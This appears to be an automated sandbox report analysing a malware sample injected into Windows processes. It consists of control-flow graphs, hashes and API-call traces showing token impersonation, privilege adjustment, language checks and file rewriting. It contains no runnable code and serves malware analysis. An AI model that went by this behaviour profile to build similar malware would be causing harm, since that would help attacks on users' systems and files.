684->698 699 bc81f1 685->699 700 bc82b2-bc82bc 685->700 686->609 704 bc82ab 686->704 707 bd16fe-bd170c 688->707 701 bd16bb 689->701 702 bd173a-bd173b 689->702 691 bdb32e-bdb330 690->691 709 bdb300 691->709 710 bdb332-bdb337 call bf72f4 691->710 692->707 708 bd1606-bd1618 692->708 693->638 694->658 715 bd16f2 694->715 695->619 696->629 718 bd173f-bd1740 697->718 713 bd16bf-bd16cd 698->713 699->700 714 bc81f7-bc828e 699->714 700->607 717 bc8357-bc836f GetTokenInformation 700->717 701->713 702->718 704->609 716 bc82b1 704->716 711 bc827c 705->711 712 bc8241 705->712 706->705 719 bc83d6 706->719 724 bd1744-bd1748 707->724 708->644 725 bdb2fd 709->725 726 bdb302 709->726 710->709 731 bdb339 710->731 711->682 711->712 712->650 722 bc8376-bc837b 712->722 715->659 716->700 717->722 718->724 722->645 728 bc8381 722->728 729 bdb2ff 725->729 730 bdb305 725->730 728->645 732 bc8387 728->732 733 bdb308-bdb315 729->733 730->733 734 bdb322-bdb32d 730->734 731->709 735 bdb33b-bdb33f 731->735 732->673 732->705 733->730 737 bdb317 733->737 734->691 735->733 737->725
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction ID: d91228ae844df0aaef159f84b829984c2af36023c655f6329e2f10033cb1a231
                                                                                                                                                          • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                          • Instruction Fuzzy Hash: D7F0903550C982CBCA3587049488F362BE2EBA1700B6C60DED486CF162CE24EC01E766

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 474 bc8318-bc831c 475 bc81e5 474->475 476 bc8322 474->476 478 bc81eb 475->478 479 bc82a3-bc82a5 475->479 476->475 477 bc8328-bc832c 476->477 480 bc832e-bc8330 477->480 481 bc82c5-bc82c8 477->481 484 bc81f1 478->484 485 bc82b2-bc82bc 478->485 482 bc83f9 479->482 483 bc82ab 479->483 489 bc82dd-bc82e3 480->489 490 bc8332 480->490 481->482 486 bc82ce 481->486 492 bc83ff 482->492 493 bc82d2-bc82d7 482->493 483->482 487 bc82b1 483->487 484->485 491 bc81f7-bc828e 484->491 485->481 488 bc8357-bc836f GetTokenInformation 485->488 496 bc828f-bc8303 call bf72ec 486->496 497 bc82d0 486->497 487->485 504 bc8376-bc837b 488->504 498 bc82e9 489->498 499 bc83a3-bc83a4 489->499 490->489 500 bc8334 490->500 494 bcf524-bcf52e 492->494 495 bc8306-bc8309 493->495 506 bcf807 494->506 495->480 503 bc830b-bc8311 CloseHandle 495->503 496->495 520 bc834f-bc8355 496->520 497->493 497->496 498->499 505 bc82ef 498->505 499->494 500->494 503->480 510 bc82f0-bc831c 504->510 511 bc8381 504->511 505->510 507 bcf80d 506->507 508 bcf8df-bcf8e0 506->508 507->508 512 bcf813 507->512 517 bd15a5-bd15aa 508->517 510->475 510->476 511->510 514 bc8387 511->514 528 bcf78f 512->528 529 bcf81b 512->529 518 bc8277-bc827a 514->518 519 bc8390-bc8393 514->519 527 bd15ae-bd15af 517->527 522 bc827c 518->522 523 bc8241 518->523 524 bc827e 519->524 525 bc8399 519->525 530 bc8341 520->530 531 bc8212-bc821a GetTokenInformation 520->531 522->523 522->524 523->504 535 bc8251-bc8260 call bf72f4 523->535 524->503 532 bc8284 524->532 525->524 533 bc839f-bc83a1 525->533 534 bd15b2-bd15b7 527->534 528->529 536 bcf795 528->536 529->508 530->531 538 bc8347 530->538 539 bc83af 531->539 540 bc8220-bc8234 531->540 532->480 533->499 541 bd15ba-bd15c1 534->541 535->519 536->506 543 bc834d 538->543 544 bd1638-bd1640 538->544 539->535 545 bc83b5 539->545 569 bc823a 540->569 570 bc83d7-bc83dd 540->570 547 bd15c7-bd15d2 541->547 548 bd1750-bd17a2 call bf72f4 541->548 543->520 549 bd170e-bd1727 544->549 550 bd1646-bd165f 544->550 545->535 551 bc83bb-bc83ca 545->551 553 bd15d4-bd15d6 547->553 554 bd1620-bd1623 547->554 549->547 559 bd172d 549->559 550->547 560 bd1665 550->560 551->518 587 bc83d0 551->587 555 bd15dc-bd15df 553->555 556 bd1670-bd1684 553->556 557 bd1625-bd1628 554->557 558 bd16a0-bd16b4 554->558 555->541 564 bd15e1-bd15f6 555->564 556->517 566 bd168a-bd168d 556->566 557->541 565 bd162a-bd1636 557->565 567 bd16f4-bd16f5 558->567 568 bd16b6-bd16b9 558->568 559->548 560->548 571 bd15fc-bd1600 564->571 572 bd16d2-bd16d7 564->572 565->544 573 bd16dc-bd16ec 565->573 574 bd172f-bd1738 566->574 575 bd1693-bd1697 566->575 582 bd16fe-bd170c 567->582 577 bd16bb 568->577 578 bd173a-bd173b 568->578 569->570 579 bc8240 569->579 570->482 571->582 583 bd1606-bd1618 571->583 572->527 573->547 584 bd16f2 573->584 586 bd173f-bd1740 574->586 580 bd16bf-bd16cd 575->580 577->580 578->586 581 bdb32e-bdb330 579->581 588 bdb300 581->588 589 bdb332-bdb337 call bf72f4 581->589 590 bd1744-bd1748 582->590 583->534 584->548 586->590 587->518 591 bc83d6 587->591 594 bdb2fd 588->594 595 bdb302 588->595 589->588 599 bdb339 589->599 597 bdb2ff 594->597 598 bdb305 594->598 600 bdb308-bdb315 597->600 598->600 601 bdb322-bdb32d 598->601 599->588 602 bdb33b-bdb33f 599->602 600->598 604 bdb317 600->604 601->581 602->600 604->594
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE ref: 00BC830B
                                                                                                                                                          • GetTokenInformation.KERNELBASE ref: 00BC8369
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.2852342745.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_bc0000_PerceptionSimulationService.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleInformationToken
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3954737543-0
                                                                                                                                                          • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction ID: 3db4e61eed12c10f7a51b4e065941561727c64796ea616e621f83aa64427213d
                                                                                                                                                          • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                          • Instruction Fuzzy Hash: 07F0903450D683CBCA358B149488F353BE2EF65750B6C50DDD446CF162CE24DC02E766

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:0.3%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:6.9%
                                                                                                                                                          Total number of Nodes:349
                                                                                                                                                          Total number of Limit Nodes:7
                                                                                                                                                          execution_graph 74859 88f38c 40 API calls 2 library calls 74433 858303 74434 8582bc 74433->74434 74435 85827c GetTokenInformation 74434->74435 74460 855c10 _strlen 74434->74460 74436 85828e GetLastError 74435->74436 74437 85814b 74435->74437 74436->74437 74438 8581ea CloseHandle 74437->74438 74439 858188 74437->74439 74490 8562e0 _strlen 74437->74490 74438->74490 74440 857a25 MultiByteToWideChar 74441 857a37 74440->74441 74442 85716d 74443 855f1c SetFilePointerEx 74442->74443 74451 857023 74442->74451 74444 873658 GetFileSizeEx 74445 881c92 RtlAdjustPrivilege 74445->74451 74446 881f67 74578 85482b 46 API calls _strlen 74446->74578 74447 85efff 74452 85f007 SetFilePointerEx 74447->74452 74560 85e381 74447->74560 74448 87522a 74457 87364a 74448->74457 74465 873566 74448->74465 74470 8746bc 74448->74470 74449 872a4d GetEnvironmentVariableW 74455 872a9f GetTempPathW 74449->74455 74456 872a58 74449->74456 74451->74445 74451->74446 74451->74460 74466 881cd1 NtQuerySystemInformation 74451->74466 74453 8562e0 73 API calls 74495 873eb7 74453->74495 74454 881f70 74458 881f7e RtlExitUserThread 74454->74458 74464 873656 74457->74464 74457->74465 74459 872ad0 74461 872ad2 wsprintfW 74459->74461 74507 8729c4 74461->74507 74462 872b31 74463 87f6c9 74577 855c10 73 API calls 2 library calls 74463->74577 74464->74444 74465->74460 74529 87382e 74465->74529 74534 872bdc 74465->74534 74533 881ce8 74466->74533 74467 873047 74481 873059 74467->74481 74547 873018 74467->74547 74468 872a40 74468->74460 74483 872a4c 74468->74483 74541 872421 74468->74541 74469 874bb4 GetTickCount 74576 855c10 73 API calls 2 library calls 74469->74576 74470->74463 74477 87fc86 74470->74477 74472 874341 74479 874909 74472->74479 74491 87434d 74472->74491 74473 856ec5 74473->74444 74473->74448 74473->74460 74473->74467 74473->74469 74473->74472 74486 8745b6 74473->74486 74487 8746a3 74473->74487 74488 873f10 CloseHandle 74473->74488 74493 872de7 74473->74493 74473->74495 74473->74507 74515 87296b _wcslen 74473->74515 74517 8749b4 74473->74517 74523 87428f 74473->74523 74473->74529 74473->74534 74473->74541 74476 87f9fa 74478 881cfc RtlInitUnicodeString 74489 881d40 RtlEqualUnicodeString 74478->74489 74480 860a10 46 API calls 74480->74515 74483->74449 74484 87329e 74574 855c10 73 API calls 2 library calls 74486->74574 74487->74470 74487->74486 74489->74533 74490->74440 74490->74442 74490->74451 74490->74460 74490->74473 74502 855d9e 74490->74502 74573 855c10 73 API calls 2 library calls 74491->74573 74492 872abb 74567 855c10 73 API calls 2 library calls 74493->74567 74495->74453 74495->74460 74495->74473 74495->74488 74527 87255c 74495->74527 74495->74529 74495->74541 74562 855dfe 74495->74562 74496 872b8f 74496->74460 74496->74507 74496->74541 74497 872b76 74497->74461 74497->74496 74497->74534 74497->74541 74500 874353 74501 85e6c3 74505 85e6c4 ReadFile 74501->74505 74502->74460 74506 855da4 74502->74506 74543 855f4a 74502->74543 74503 874927 74575 855c10 73 API calls 2 library calls 74503->74575 74504 872ded 74509 85e33d 74504->74509 74513 872dff 74504->74513 74511 85e66f 74505->74511 74512 85e337 74505->74512 74506->74460 74521 855df2 ReadFile 74506->74521 74507->74462 74564 85482b 46 API calls _strlen 74507->74564 74570 855c10 73 API calls 2 library calls 74509->74570 74510 881d90 NtOpenThread 74518 881df5 NtImpersonateThread 74510->74518 74510->74533 74512->74509 74540 85e31d 74512->74540 74568 855c10 73 API calls 2 library calls 74513->74568 74514 873169 GetTickCount 74514->74534 74556 872cff 74514->74556 74515->74447 74515->74449 74515->74455 74515->74459 74515->74460 74515->74468 74515->74480 74515->74497 74515->74507 74515->74534 74552 8729db 74515->74552 74516 874938 74517->74523 74517->74534 74525 881e24 NtOpenThreadTokenEx 74518->74525 74518->74533 74521->74460 74521->74562 74522 85e329 WriteFile 74522->74512 74522->74540 74523->74541 74545 873cd5 74523->74545 74525->74533 74526 873003 74531 872cbf 74526->74531 74537 873012 74526->74537 74527->74460 74539 87257b 74527->74539 74527->74541 74563 8725aa 73 API calls 74527->74563 74528 87345d 74572 855c10 73 API calls 2 library calls 74528->74572 74529->74460 74546 872c72 74529->74546 74529->74547 74530 872e05 74566 855c10 73 API calls 2 library calls 74531->74566 74532 881ed9 NtClose 74532->74533 74533->74451 74533->74478 74533->74489 74533->74510 74533->74532 74538 881ee7 NtClose 74533->74538 74550 881e4e NtAdjustPrivilegesToken 74533->74550 74534->74449 74534->74460 74534->74507 74534->74513 74534->74514 74534->74528 74534->74541 74534->74556 74537->74546 74537->74547 74538->74533 74540->74522 74551 85e38d 74540->74551 74541->74460 74541->74527 74542 873463 74543->74443 74543->74460 74544 872cc8 74545->74460 74545->74488 74565 855c10 73 API calls 2 library calls 74546->74565 74547->74460 74547->74467 74571 855c10 73 API calls 2 library calls 74547->74571 74549 8562e0 73 API calls 74549->74556 74550->74532 74550->74533 74552->74507 74552->74541 74554 872410 74552->74554 74557 8729f4 74552->74557 74553 872c7b 74555 872ed5 74569 855c10 73 API calls 2 library calls 74555->74569 74556->74514 74556->74534 74556->74546 74556->74549 74556->74555 74559 872d0e 74556->74559 74557->74463 74557->74507 74560->74501 74560->74505 74560->74540 74560->74551 74561 872edb 74562->74460 74563->74562 74564->74492 74565->74553 74566->74544 74567->74504 74568->74530 74569->74561 74570->74526 74571->74484 74572->74542 74573->74500 74574->74503 74575->74516 74576->74495 74577->74476 74578->74454 74848 88f600 26 API calls 74866 896f07 65 API calls 3 library calls 74832 8558fc CloseHandle 74817 856ee5 83 API calls _wcslen 74849 89661e RtlUnwind 74818 855c10 99 API calls 2 library calls 74868 8725aa 76 API calls 74655 858318 GetTokenInformation 74656 858151 74655->74656 74657 8581ea CloseHandle 74656->74657 74661 8562e0 _strlen 74656->74661 74679 855c10 _strlen 74656->74679 74657->74661 74658 857a25 MultiByteToWideChar 74659 857a37 74658->74659 74660 85716d 74662 855f1c SetFilePointerEx 74660->74662 74671 857023 74660->74671 74661->74658 74661->74660 74661->74671 74661->74679 74687 856ec5 74661->74687 74692 855d9e 74661->74692 74663 873658 GetFileSizeEx 74664 881f67 74797 85482b 46 API calls _strlen 74664->74797 74665 881c92 RtlAdjustPrivilege 74665->74671 74666 8562e0 73 API calls 74713 873eb7 74666->74713 74667 85efff 74672 85f007 SetFilePointerEx 74667->74672 74774 85e381 74667->74774 74668 87522a 74676 87364a 74668->74676 74684 873566 74668->74684 74693 8746bc 74668->74693 74669 872a4d GetEnvironmentVariableW 74674 872a9f GetTempPathW 74669->74674 74675 872a58 74669->74675 74671->74664 74671->74665 74671->74679 74685 881cd1 NtQuerySystemInformation 74671->74685 74673 881f70 74677 881f7e RtlExitUserThread 74673->74677 74683 873656 74676->74683 74676->74684 74678 872ad0 74680 872ad2 wsprintfW 74678->74680 74706 8729c4 74680->74706 74681 872b31 74682 87f6c9 74796 855c10 73 API calls 2 library calls 74682->74796 74683->74663 74684->74679 74755 87382e 74684->74755 74756 872bdc 74684->74756 74702 881ce8 74685->74702 74686 860a10 46 API calls 74696 87296b _wcslen 74686->74696 74687->74663 74687->74668 74687->74679 74688 873047 74687->74688 74690 873f10 CloseHandle 74687->74690 74691 874bb4 GetTickCount 74687->74691 74695 874341 74687->74695 74687->74696 74687->74706 74711 8745b6 74687->74711 74712 8746a3 74687->74712 74687->74713 74718 872de7 74687->74718 74721 872421 74687->74721 74739 8749b4 74687->74739 74751 87428f 74687->74751 74687->74755 74687->74756 74697 873018 74688->74697 74705 873059 74688->74705 74689 872a40 74689->74679 74708 872a4c 74689->74708 74689->74721 74795 855c10 73 API calls 2 library calls 74691->74795 74692->74679 74729 855da4 74692->74729 74758 855f4a 74692->74758 74693->74682 74701 87fc86 74693->74701 74704 874909 74695->74704 74715 87434d 74695->74715 74696->74667 74696->74669 74696->74674 74696->74678 74696->74679 74696->74686 74696->74689 74696->74706 74717 872b76 74696->74717 74696->74756 74770 8729db 74696->74770 74697->74679 74697->74688 74790 855c10 73 API calls 2 library calls 74697->74790 74700 87f9fa 74702->74671 74703 881cfc RtlInitUnicodeString 74702->74703 74714 881d40 RtlEqualUnicodeString 74702->74714 74733 881d90 NtOpenThread 74702->74733 74754 881ed9 NtClose 74702->74754 74761 881ee7 NtClose 74702->74761 74769 881e4e NtAdjustPrivilegesToken 74702->74769 74703->74714 74706->74681 74783 85482b 46 API calls _strlen 74706->74783 74708->74669 74709 87329e 74793 855c10 73 API calls 2 library calls 74711->74793 74712->74693 74712->74711 74713->74666 74713->74679 74713->74687 74713->74690 74720 87255c 74713->74720 74713->74721 74750 855dfe 74713->74750 74713->74755 74714->74702 74792 855c10 73 API calls 2 library calls 74715->74792 74716 872abb 74717->74680 74717->74721 74722 872b8f 74717->74722 74717->74756 74786 855c10 73 API calls 2 library calls 74718->74786 74720->74679 74720->74721 74762 87257b 74720->74762 74782 8725aa 73 API calls 74720->74782 74721->74679 74721->74720 74722->74679 74722->74706 74722->74721 74725 874353 74726 85e6c3 74728 85e6c4 ReadFile 74726->74728 74727 874927 74794 855c10 73 API calls 2 library calls 74727->74794 74734 85e66f 74728->74734 74735 85e337 74728->74735 74729->74679 74743 855df2 ReadFile 74729->74743 74731 85e33d 74789 855c10 73 API calls 2 library calls 74731->74789 74732 872ded 74732->74731 74736 872dff 74732->74736 74733->74702 74740 881df5 NtImpersonateThread 74733->74740 74735->74731 74763 85e31d 74735->74763 74787 855c10 73 API calls 2 library calls 74736->74787 74737 873169 GetTickCount 74737->74756 74776 872cff 74737->74776 74738 874938 74745 8749ba 74739->74745 74739->74756 74740->74702 74747 881e24 NtOpenThreadTokenEx 74740->74747 74743->74679 74743->74750 74744 85e329 WriteFile 74744->74735 74744->74763 74745->74721 74771 873cd5 74745->74771 74747->74702 74748 873003 74753 872cbf 74748->74753 74760 873012 74748->74760 74749 87345d 74791 855c10 73 API calls 2 library calls 74749->74791 74750->74679 74751->74721 74751->74771 74752 872e05 74785 855c10 73 API calls 2 library calls 74753->74785 74754->74702 74755->74679 74755->74697 74767 872c72 74755->74767 74756->74669 74756->74679 74756->74706 74756->74721 74756->74736 74756->74737 74756->74749 74756->74776 74758->74662 74758->74679 74760->74697 74760->74767 74761->74702 74763->74744 74777 85e38d 74763->74777 74764 8562e0 73 API calls 74764->74776 74765 873463 74766 872cc8 74784 855c10 73 API calls 2 library calls 74767->74784 74769->74702 74769->74754 74770->74706 74770->74721 74773 872410 74770->74773 74778 8729f4 74770->74778 74771->74679 74771->74690 74772 872c7b 74774->74726 74774->74728 74774->74763 74774->74777 74775 872ed5 74788 855c10 73 API calls 2 library calls 74775->74788 74776->74737 74776->74756 74776->74764 74776->74767 74776->74775 74780 872d0e 74776->74780 74778->74682 74778->74706 74781 872edb 74782->74750 74783->74716 74784->74772 74785->74766 74786->74732 74787->74752 74788->74781 74789->74748 74790->74709 74791->74765 74792->74725 74793->74727 74794->74738 74795->74713 74796->74700 74797->74673 74819 859d9a SetFilePointerEx 74820 8921aa 51 API calls 4 library calls 74833 85a52c GetFileSize 74802 8558ab RtlExitUserThread 74834 851130 GetPEB 74853 855c10 98 API calls 2 library calls 74870 8548fe 70 API calls 74811 858340 76 API calls 74812 891845 11 API calls 2 library calls 74823 855c10 97 API calls 2 library calls 74835 855550 112 API calls 74843 858340 82 API calls 74844 85a6d0 78 API calls 74807 8980e0 21 API calls 74846 855c10 100 API calls 2 library calls 74815 855074 VirtualAlloc 74579 85597d 74580 855915 CreateThread 74579->74580 74581 855981 74579->74581 74591 855917 74580->74591 74581->74580 74590 855884 74581->74590 74582 8558fc CloseHandle 74583 8558c7 RtlExitUserThread 74585 855ad8 CreateThread 74589 855b36 CloseHandle 74585->74589 74585->74590 74653 8554f0 74585->74653 74586 8558b6 74586->74583 74592 8548fe 74586->74592 74587 855870 74587->74586 74587->74591 74587->74592 74595 8558d4 74587->74595 74622 877960 74587->74622 74588 855af6 74588->74590 74588->74595 74596 855b1c 74588->74596 74649 8548f0 6 API calls 74588->74649 74589->74592 74598 855a29 74589->74598 74590->74585 74590->74586 74590->74587 74590->74588 74590->74589 74590->74592 74591->74582 74591->74592 74594 8552e9 74595->74587 74595->74592 74597 8550f6 74595->74597 74648 8549f0 GetUserDefaultLangID GetUserDefaultUILanguage 74595->74648 74596->74589 74596->74592 74596->74595 74615 854a0f 74596->74615 74597->74592 74598->74592 74598->74594 74598->74595 74599 8553f7 Sleep 74598->74599 74600 855a3f 74598->74600 74608 855144 74598->74608 74610 854f75 74598->74610 74603 855273 ReleaseMutex CloseHandle 74599->74603 74599->74608 74600->74595 74600->74610 74601 854f50 RtlExitUserThread 74601->74615 74603->74597 74605 85500a Sleep 74605->74615 74607 855268 74607->74603 74608->74592 74608->74597 74608->74603 74608->74607 74611 854e3a 74608->74611 74608->74615 74609 854db0 GetSystemDefaultLangID 74609->74615 74618 854a02 74609->74618 74610->74597 74610->74615 74610->74618 74611->74592 74612 854e3c GetUserDefaultUILanguage 74611->74612 74612->74592 74614 854e51 74612->74614 74613 8549f0 74613->74592 74613->74612 74613->74618 74615->74592 74615->74601 74615->74605 74615->74609 74615->74613 74615->74618 74619 855bc0 74615->74619 74616 854be2 GetUserDefaultLangID 74617 854bea 74616->74617 74616->74618 74618->74592 74618->74616 74620 855bcd VirtualAlloc 74619->74620 74621 855bc9 74619->74621 74620->74615 74621->74620 74625 8778e1 74622->74625 74623 877b41 GetLastError 74623->74625 74624 877924 GetWindowsDirectoryW 74624->74625 74627 8778c0 74624->74627 74625->74622 74625->74623 74625->74624 74626 877bc4 GetWindowsDirectoryW 74625->74626 74625->74627 74628 877d75 74625->74628 74629 877dd0 GetUserNameW 74625->74629 74632 87809e GetLastError 74625->74632 74633 877ab1 74625->74633 74634 878019 GetVolumeInformationW 74625->74634 74635 877f6f 74625->74635 74637 878048 74625->74637 74642 877bb6 74625->74642 74643 878063 GetUserNameW 74625->74643 74645 8778c7 GetVolumeInformationW 74625->74645 74646 877eee GetComputerNameW 74625->74646 74647 877e1a GetLastError 74625->74647 74626->74587 74627->74587 74650 85482b 46 API calls _strlen 74628->74650 74629->74625 74631 877d7a 74631->74587 74632->74587 74633->74635 74633->74642 74634->74637 74651 85482b 46 API calls _strlen 74635->74651 74652 85482b 46 API calls _strlen 74637->74652 74639 877c96 74639->74587 74640 877f79 74640->74587 74641 87804d 74641->74587 74642->74626 74642->74639 74643->74625 74644 878071 74643->74644 74644->74587 74645->74625 74645->74627 74646->74625 74647->74587 74648->74595 74649->74588 74650->74631 74651->74640 74652->74641 74654 8554f4 74653->74654 74875 898370 21 API calls __startOneArgErrorHandling 74840 855c10 ReadFile SetFilePointerEx
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,00855563), ref: 008581EB
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,00855563), ref: 00858227
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,00855563), ref: 0085826F
                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,?,?,?,?,00855563), ref: 00858280
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00855563), ref: 0085828E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                                                                                                          • String ID: $j@h
                                                                                                                                                          • API String ID: 2078281146-3739420905
                                                                                                                                                          • Opcode ID: 7e9667233e2ca020f685571630ed3935140e3f80706f61308ec09c7ecd71a246
                                                                                                                                                          • Instruction ID: a6b46834449dbd90b8a3cf4cd1bcd223fc9fcac33cc7df09f47cfee672483aca
                                                                                                                                                          • Opcode Fuzzy Hash: 7e9667233e2ca020f685571630ed3935140e3f80706f61308ec09c7ecd71a246
                                                                                                                                                          • Instruction Fuzzy Hash: 4633397190C3809FDB358B288C547367BA0FB61326F4C85AAE899C72A6E635DD0CD753
                                                                                                                                                          APIs
                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00855A6E), ref: 00877925
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DirectoryWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3619848164-0
                                                                                                                                                          • Opcode ID: 2ab93d819e860beea51faa6708dbf56ab20d1fdbf72380fc9e3a3df8d5482e79
                                                                                                                                                          • Instruction ID: 3c9307c340e4ba90e786d361df2b6e5757b55e8c36eb10aa35866edb1ec20845
                                                                                                                                                          • Opcode Fuzzy Hash: 2ab93d819e860beea51faa6708dbf56ab20d1fdbf72380fc9e3a3df8d5482e79
                                                                                                                                                          • Instruction Fuzzy Hash: C0A1F52190D3859EEB3257288C09B397E64FF62724F4CC5D6E59CC61EEE528CD08D297
                                                                                                                                                          APIs
                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 008558C7
                                                                                                                                                          • CreateThread.KERNELBASE(00000000), ref: 00855915
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Thread$CreateExitUser
                                                                                                                                                          • String ID: gfff
                                                                                                                                                          • API String ID: 4108186749-1553575800
                                                                                                                                                          • Opcode ID: 39d53e92bfa86b5b777b316ef96a0aee0a57b3cdda6e914181f8fd38985c7b3d
                                                                                                                                                          • Instruction ID: ec47f0d08bdfabc787f3baf29c9fc58ac01463194262ba30bb0e0e3c7ec31698
                                                                                                                                                          • Opcode Fuzzy Hash: 39d53e92bfa86b5b777b316ef96a0aee0a57b3cdda6e914181f8fd38985c7b3d
                                                                                                                                                          • Instruction Fuzzy Hash: 06A2F62050C780DECB36462888697767FA1FB72327F4C459BEC95DA2E2DA699C0CC753
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b16eee048de72aa2af01ff0270df8b7e2793fac3faaa0f619952882107b68609
                                                                                                                                                          • Instruction ID: 0567df4531125b4dce60afe7a409085c7eb8af5cef23eab41fb4600e6e2ad846
                                                                                                                                                          • Opcode Fuzzy Hash: b16eee048de72aa2af01ff0270df8b7e2793fac3faaa0f619952882107b68609
                                                                                                                                                          • Instruction Fuzzy Hash: 93C13424949B819EDF36462C483A7752BA0FB6233FF8C31D6EC55C61F2E6684CCC9252
                                                                                                                                                          APIs
                                                                                                                                                          • GetSidSubAuthorityCount.ADVAPI32 ref: 00858199
                                                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,00855563), ref: 008581EB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AuthorityCloseCountHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1604591301-0
                                                                                                                                                          • Opcode ID: 87e4ced3b15861f30d977d29d2b074694cb069a92d469b4806857fdcb7b21daa
                                                                                                                                                          • Instruction ID: 7533cc39d97a9170414010aca2def284c3200d2b3d2c5ef436d05150fca01c17
                                                                                                                                                          • Opcode Fuzzy Hash: 87e4ced3b15861f30d977d29d2b074694cb069a92d469b4806857fdcb7b21daa
                                                                                                                                                          • Instruction Fuzzy Hash: F531E33494C600DBCD36862898199363E61FA61333F9C8696ED95E71F1F924AC2DC612
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a54cd65ab5c4864011d6b94cee480986e615aef89721ba2ec2a89c967dc07dd0
                                                                                                                                                          • Instruction ID: 9709c1bbb961ce3584d3a29e3d8424600786ff58c1c7aee6b0619bc4b0e8775d
                                                                                                                                                          • Opcode Fuzzy Hash: a54cd65ab5c4864011d6b94cee480986e615aef89721ba2ec2a89c967dc07dd0
                                                                                                                                                          • Instruction Fuzzy Hash: 11F0E234A84E40D7DD311A6998087353E80FB61777F480A0BDCA8F22F0EE058C0D820E
                                                                                                                                                          APIs
                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),?,?), ref: 0085832A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.2848440213.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_850000_perfhost.jbxd
